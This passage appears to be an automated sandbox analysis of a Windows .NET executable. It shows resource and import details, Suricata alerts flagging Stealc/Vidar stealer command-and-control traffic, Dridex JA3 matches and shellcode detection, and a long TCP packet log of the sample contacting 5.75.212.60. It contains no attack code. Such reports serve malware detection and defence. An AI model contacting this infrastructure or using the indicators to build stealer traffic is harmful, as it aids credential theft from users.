                                                                                      RT_GROUP_ICON0x64a0ec0x4cdata0.8157894736842105
                                                                                      RT_VERSION0x64a1380x394OpenPGP Secret Key0.4115720524017467
                                                                                      RT_MANIFEST0x64a4cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                      2024-07-26T03:17:58.166553+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config443497345.75.212.60192.168.2.4
                                                                                      2024-07-26T03:18:12.224592+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49750443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:10.501096+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49747443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:01.301744+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49737443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:19.621041+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49754443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:47.150687+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434976513.85.23.86192.168.2.4
                                                                                      2024-07-26T03:17:53.826668+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49731443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:17:59.522089+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1443497355.75.212.60192.168.2.4
                                                                                      2024-07-26T03:18:00.297595+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49736443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:04.383083+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49738443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:09.045746+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434974213.85.23.86192.168.2.4
                                                                                      2024-07-26T03:17:59.521867+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST49735443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:16.550114+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49753443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:17:58.862094+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49735443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:27.420564+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49759443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:17:57.520605+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49734443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:28.739936+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49760443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:25.674397+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49758443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:17:54.918982+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49732443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:06.522290+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49740443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:22.203919+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49756443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:13.800595+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49751443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:23.573758+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49757443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:08.725191+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49743443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:17:56.842971+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST49733443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:15.242730+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49752443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:17:56.215113+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49733443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:05.490210+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49739443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:07.652390+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49741443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:11.361781+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected443497475.75.212.60192.168.2.4
                                                                                      2024-07-26T03:18:20.847588+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex49755443192.168.2.45.75.212.60
                                                                                      2024-07-26T03:18:03.325570+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected443497375.75.212.60192.168.2.4

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jul 26, 2024 03:17:44.756768942 CEST49675443192.168.2.4173.222.162.32
                                                                                      Jul 26, 2024 03:17:51.286309004 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:51.286406040 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:51.286495924 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:51.293637991 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:51.293679953 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:51.944339991 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:51.944420099 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.422945976 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.422986984 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.423392057 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.423439026 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.426650047 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.468497992 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.822160006 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.822189093 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.822204113 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.822227001 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.822249889 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.822283983 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.822314024 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.909410000 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.909455061 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.909482956 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.909507990 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.909519911 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.909542084 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.911442995 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.911473036 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.911499023 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.911504030 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.911529064 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.911544085 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.911561966 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.912895918 CEST49730443192.168.2.423.192.247.89
                                                                                      Jul 26, 2024 03:17:52.912911892 CEST4434973023.192.247.89192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.940557957 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:52.940596104 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:52.940650940 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:52.941149950 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:52.941159010 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:53.826596022 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:53.826668024 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:53.832005024 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:53.832015991 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:53.832350016 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:53.832401991 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:53.832935095 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:53.876491070 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.267689943 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.267875910 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.267909050 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.267952919 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.267956018 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.267995119 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.270282984 CEST49731443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.270296097 CEST443497315.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.272321939 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.272361994 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.272439003 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.272661924 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.272676945 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.366092920 CEST49675443192.168.2.4173.222.162.32
                                                                                      Jul 26, 2024 03:17:54.918787003 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.918982029 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.919962883 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.919987917 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:54.921741009 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:54.921757936 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:55.565622091 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:55.565809965 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:55.565849066 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:55.565932035 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:55.566294909 CEST49732443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:55.566318989 CEST443497325.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:55.568119049 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:55.568156958 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:55.568227053 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:55.568432093 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:55.568444014 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.214968920 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.215112925 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.215785027 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.215795040 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.217760086 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.217767000 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.842991114 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.843017101 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.843055010 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.843086958 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.843102932 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.843103886 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.843136072 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.843163967 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.843373060 CEST49733443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.843389034 CEST443497335.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.845110893 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.845134020 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:56.845195055 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.845376968 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:56.845386028 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:57.520375013 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:57.520605087 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:57.520946026 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:57.520956039 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:57.522797108 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:57.522802114 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.166383982 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.166414976 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.166476011 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.166496992 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.166553974 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.166553974 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.166902065 CEST49734443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.166918039 CEST443497345.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.168440104 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.168468952 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.168545008 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.168744087 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.168751955 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.861908913 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.862093925 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.862580061 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.862595081 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:58.864325047 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:58.864337921 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.521903992 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.521997929 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.522042036 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.522072077 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.522355080 CEST49735443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.522373915 CEST443497355.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.583719969 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.583775043 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:17:59.583843946 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.584053040 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:17:59.584064007 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.297411919 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.297595024 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.298357964 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.298368931 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.300046921 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.300057888 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.300105095 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.300112963 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.585923910 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.585969925 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:00.586076975 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.586342096 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:00.586352110 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.030513048 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.030602932 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.030648947 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.030687094 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.031639099 CEST49736443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.031660080 CEST443497365.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.301578045 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.301743984 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.302386045 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.302418947 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.304418087 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.304436922 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743607044 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743634939 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743649960 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743680954 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.743722916 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.743733883 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.743793011 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.774513006 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.774554014 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.774715900 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.774715900 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.774744987 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.774791956 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.841377974 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.841403961 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.841509104 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.841542006 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.841589928 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.871805906 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.871836901 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.871962070 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.871974945 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.872020006 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.912061930 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.912090063 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.912182093 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.912210941 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.912261009 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.936887980 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.936954021 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.936994076 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.937005043 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.937052965 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.937078953 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.955719948 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.955776930 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.955878019 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.955887079 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.955948114 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.974121094 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.974167109 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.974212885 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.974221945 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.974251986 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.974271059 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.993182898 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.993285894 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:01.993328094 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:01.993411064 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.007885933 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.007942915 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.008009911 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.008038998 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.008079052 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.008096933 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.028187037 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.028204918 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.028310061 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.028330088 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.028373003 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.037249088 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.037272930 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.037395954 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.037410021 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.037497044 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.049474955 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.049493074 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.049595118 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.049618959 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.049690008 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.058665991 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.058696985 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.058752060 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.058757067 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.058788061 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.058806896 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.067965984 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.068012953 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.068065882 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.068073034 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.068103075 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.068121910 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.075916052 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.075979948 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.076034069 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.076040983 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.076076984 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.076090097 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.088212967 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.088259935 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.088406086 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.088413954 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.088479042 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.101979971 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.102041006 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.102089882 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.102109909 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.102144003 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.102163076 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.114365101 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.114413977 CEST443497375.75.212.60192.168.2.4
                                                                                      Jul 26, 2024 03:18:02.114468098 CEST49737443192.168.2.45.75.212.60
                                                                                      Jul 26, 2024 03:18:02.114490032 CEST443497375.75.212.60192.168.2.4
